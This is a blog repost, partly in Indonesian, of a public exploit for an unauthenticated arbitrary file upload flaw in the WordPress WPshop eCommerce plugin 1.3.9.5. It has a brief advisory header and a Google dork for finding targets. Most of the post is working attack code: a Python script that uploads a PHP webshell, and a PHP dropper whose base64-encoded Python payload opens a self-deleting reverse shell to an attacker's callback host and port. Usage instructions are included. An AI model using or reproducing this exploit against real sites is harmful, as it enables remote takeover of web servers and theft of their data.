Halaman

WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload

Jumat, 04 Desember 2015

#-Title: WordPress WPshop eCommerce 1.3.9.5 Shell Upload
#-Author: g0blin
#-Lab : research[dot]g0blin[dot]co[dot]uk
#-Date: 2015-03-02
#-Link Download : wordpress. org/plugins/wpshop/
#-Google Dork: inurl:wp-content/themes/wpshop/
#-Tested on : Linux
#-Fixed in : 1.3.9.6
////////////////////////////////////////////////////////////////////////////////////////////

Information of Bug : 

CVSS Score : 6.4
CSSS Vector : CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope : remote
Authorization Required : None

When Vulnerable : Blank

Description : 
The script �includes/ajax.php� allows execution of various actions by anonymous users. The action name is provided in the �elementCode� parameter. One of these actions is named �ajaxUpload�. This function allows for upload of arbitrary files, due to lack of sanitation of user input.


Solution:

Update to version 1.3.9.6.

-- Proof Of Concept --

require : Python (file.py)
How To use :
Python Name-script.py http://web. com back_python (your-ip) 1337
- Example :
Python wpshop.py http://web. com back_python.php 192.168.2.116 1337

Script wpshop.py : 
#!/usr/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150427.1
# Licence: WTFPL - wtfpl.net
import requests
import sys
__version__ = "20150427.1"

def banner():
print """\x1b[1;32m
��+ ��+������+ �������+��+ ��+ ������+ ������+ ��+ ��+���+ ��+
��� �����+--��+��+----+��� �����+-����+��+--��+��� �������+ ���
��� �+ ���������++�������+�������������+���������++��� �+ �����+��+ ���
������+�����+---+ +----�����+--�������++�����+---+ ������+������+��+���
+���+���++��� ����������� ���+������++��� +���+���++��� +�����
+--++--+ +-+ +------++-+ +-+ +-----+ +-+ +--++--+ +-+ +---+
Exploit for WPShop Ecommerce, WPVDB-7830 Version: %s\x1b[0m""" %(__version__)

def php_encoder(php):
f = open(php, "r").read()
f = f.replace("<?php", "")
f = f.replace("?>", "")
encoded = f.encode('base64')
encoded = encoded.replace("\n", "")
encoded = encoded.strip()
code = "eval(base64_decode('%s'));" %(encoded)
return code

def shell_upload(url):
target_url = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
try:
print "\x1b[1;32m{+} Using target URL of: %s\x1b[0m" %(target_url)
r = requests.post(url=target_url, files={"wpshop_file":("test.php", "<?php @assert(filter_input(0,woot,516)); ?>")})
except Exception, e:
sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
if r.text:
return r.text.strip()
else:
sys.exit("\x1b[1;31m{-} Something fucked up... Our shell was not uploaded :/\x1b[0m")


def spawn_backconnect(shell_url, payload, cb_host, cb_port):
cookies = {'host': cb_host, 'port': cb_port}
data = {'woot': payload}
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'}
try:
print "\x1b[1;32m{*} Sending our payload...\x1b[0m"
r = requests.post(url=shell_url, data=data, headers=headers, verify=False, cookies=cookies)
except Exception, e:
sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
if r.text:
print r.text

def pop_shell(target, code, cb_host, cb_port):
shell_url = shell_upload(url=target)
print "\x1b[1;32m{+} Our shell is at: %s\x1b[0m" %(shell_url)
try:
print "\x1b[1;36m{*} Sending Backconnect to %s:%s...\x1b[0m" %(cb_host, cb_port)
spawn_backconnect(shell_url=shell_url, payload=code, cb_host=cb_host, cb_port=cb_port)
except Exception, e:
sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))

def main(args):
banner()
if len(args) != 5:
sys.exit("use: %s http://host/wordpress_baseurl/ <payload.php> <cb_host> <cb_port>" %(args[0]))
pop_shell(target=args[1], code=php_encoder(args[2]), cb_host=args[3], cb_port=args[4])

if __name__ == "__main__":
main(args=sys.argv)


Script back_python.php : 

<?php
$cbhost = $_COOKIE['host'];
$cbport = $_COOKIE['port'];
echo "{+} Using ".$cbhost.":".$cbport." as callback...\n{+} Dropping shell...\n";
$shell =
"IyEvdXNyL2Jpbi9weXRob24yCiMgY29kaW5nOiB1dGYtOAojIFNlbGYgRGVzdHJ1Y3RpbmcsIERhZW1vbmluZyBSZXZlcnNlIFBUWS4KIyBybSdzIHNlbGYgb24gcXVpdCA6MwojIFRPRE86CiMgMTogQWRkIGNyeXB0bwojIDI6IEFkZCBwcm9jbmFtZSBzcG9vZgppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcHR5CmltcG9ydCBzb2NrZXQKaW1wb3J0IGNvbW1hbmRzCgpzaGVsbG1zZyA9ICJceDFiWzBtXHgxYlsxOzM2bUdvdCByb290IHlldD9ceDFiWzBtXHJcbiIgIyBuZWVkeiBhc2NpaQoKZGVmIHF1aXR0ZXIobXNnKToKICAgIHByaW50IG1zZwogICAgb3MudW5saW5rKG9zLnBhdGguYWJzcGF0aChfX2ZpbGVfXykpICMgdW5jb21tZW50IGZvciBnb2dvc2VsZmRlc3RydWN0CiAgICBzeXMuZXhpdCgwKQoKZGVmIHJldmVyc2UoY2Job3N0LCBjYnBvcnQpOgogICAgdHJ5OgogICAgICAgIHVuYW1lID0gY29tbWFuZHMuZ2V0b3V0cHV0KCJ1bmFtZSAtYSIpCiAgICAgICAgaWQgPSBjb21tYW5kcy5nZXRvdXRwdXQoImlkIikKICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgcXVpdHRlcignZ3JhYiB1bmFtZS9pZCBmYWlsJykKICAgIHRyeToKICAgICAgICBzb2NrID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgIHNvY2suY29ubmVjdCgoY2Job3N0LCBpbnQoY2Jwb3J0KSkpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGNvbm5lY3Rpb24gZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAwKQogICAgICAgIG9zLmR1cDIoc29jay5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHNvY2suZmlsZW5vKCksIDIpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGR1cDIgZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MucHV0ZW52KCJISVNURklMRSIsICIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIsICcvdXNyL2xvY2FsL3NiaW46L3Vzci9zYmluOi9zYmluOi9iaW46L3Vzci9sb2NhbC9iaW46L3Vzci9iaW4nKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHV0ZW52IGZhaWwnKQogICAgdHJ5OgogICAgICAgIHNvY2suc2VuZChzaGVsbG1zZykKICAgICAgICBzb2NrLnNlbmQoJ1x4MWJbMTszMm0nK3VuYW1lKyJcclxuIitpZCsiXHgxYlswbVxyXG4iKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdzZW5kIGlkL3VuYW1lIGZ1Y2t1cCcpCiAgICB0cnk6CiAgICAgICAgcHR5LnNwYXduKCcvYmluL2Jhc2gnKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHR5IHNwYXduIGZhaWwnKQogICAgcXVpdHRlcigncXVpdHRpbmcsIGNsZWFudXAnKQoKZGVmIG1haW4oYXJncyk6CiAgICBpZiBvcy5mb3JrKCkgPiAwOiAKICAgICAgICBvcy5fZXhpdCgwKQogICAgcmV2ZXJzZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgbWFpbihzeXMuYXJndikK";
$x = fopen("/tmp/x", "w+");
fwrite($x, base64_decode($shell));
fclose($x);
echo "{+} Shell dropped... Triggering...\n";
system("python /tmp/x ".$cbhost." ".$cbport);
die('{+} got shell?'); // payload should have rm'd itself
?>


Result Shell : Here !!

Tidak ada komentar:

Posting Komentar